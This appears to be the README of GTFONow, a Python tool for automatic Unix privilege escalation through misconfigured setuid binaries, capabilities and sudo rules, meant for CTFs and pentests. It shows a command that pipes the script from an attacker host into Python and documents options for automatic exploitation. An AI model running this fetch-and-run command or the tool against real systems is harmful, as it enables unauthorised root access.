Automatic privilege escalation on unix systems by exploiting misconfigured setuid/setgid binaries, capabilities and sudo permissions. Designed for CTFs but also applicable in real world pentests.
curl http://attackerhost/gtfonow.py | python
To use GTFONow
, simply run the script from your command line. The basic syntax is as follows:
python gtfonow.py [OPTIONS]
It can also be run by piping the output of curl:
curl http://attacker.host/gtfonow.py | python
--level
: Sets the level of checks to perform. You can choose between:
1
(default) for a quick scan.2
for a more thorough scan.python gtfonow.py --level 2
--risk
: Specifies the risk level of the exploit to perform. The options are:
1
(default) for safe operations.2
for more aggressive operations such as file modifications, primarily for use in CTFs, if using on real engagements, ensure you understand what this is doing.python gtfonow.py --risk 2
--command
: Issues a single command instead of spawning an interactive shell. This is mainly for debugging purposes.
python gtfonow.py --command 'ls -la'
--auto
: Automatically exploits without user wizard.-v
, --verbose
: Enables verbose output.
python gtfonow.py --verbose
By design GTFONow is a backwards compatible, stdlib only python script, meaning it should work on any variant of Unix if Python is installed.